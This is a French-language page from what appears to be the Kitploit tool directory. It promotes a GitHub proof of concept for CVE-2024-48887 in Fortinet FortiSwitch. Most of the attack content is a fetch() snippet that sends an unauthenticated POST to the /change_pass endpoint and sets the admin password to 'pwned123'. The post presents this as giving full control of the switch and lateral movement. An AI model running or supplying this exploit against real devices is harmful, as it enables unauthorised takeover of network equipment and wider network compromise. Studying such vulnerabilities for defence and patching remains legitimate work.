Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-48887-FortiSwitch-Exploit — un extrait JavaScript léger montrant comment des changements de mot de passe non autorisés peuvent être déclenchés sur des endpoints GUI vulnérables de Fortinet FortiSwitch. | Kitploit
Outils/GitHubGitHub/cybersecplayground/cve-2024-48887-fortiswitch-exploit
Analyse des VulnérabilitésExploitationMouvement LatéralExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubcybersecplayground/cve-2024-48887-fortiswitch-exploit

CVE-2024-48887-FortiSwitch-Exploit

un extrait JavaScript léger montrant comment des changements de mot de passe non autorisés peuvent être déclenchés sur des endpoints GUI vulnérables de Fortinet FortiSwitch.

Voir le dépôt
23il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-48887-FortiSwitch-Exploit

🚨 PoC (JavaScript) de FortiSwitch CVE-2024-48887 🚨

🔥 Je viens de publier un extrait JavaScript léger montrant comment des changements de mot de passe non autorisés peuvent être déclenchés sur les points d'accès GUI de Fortinet FortiSwitch vulnérables.

🛠️ À propos de la vulnérabilité : Un attaquant peut créer une simple requête fetch() pour manipuler les paramètres de mot de passe sans aucune authentification, en ciblant directement les variantes du point d'accès /change_pass.

root@kitploit:~
fetch('http://target-ip/change_pass', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({
    username: 'admin',
    newpass: 'pwned123',
    confirm: 'pwned123'
  })
})
.then(res => res.text())
.then(data => console.log('Response:', data));

💡 Impact : Contrôle total du commutateur, potentiel de mouvement latéral et compromission du réseau.

📁 Dépôt : github.com/yourusername/CVE-2024-48887-FortiSwitch-Exploit ⭐ Mettez une étoile au dépôt et partagez-le avec vos collègues de l'infosec !

📢 Suivez l'analyse complète et les alertes en temps réel via @cybersecplayground

#JavaScript #infosec #bugbounty #CVE2024 #Fortinet #FortiSwitch #RCE #exploitdev #cybersecurity #PoC #github #OSINT #cybersecplayground

Télécharger l’outil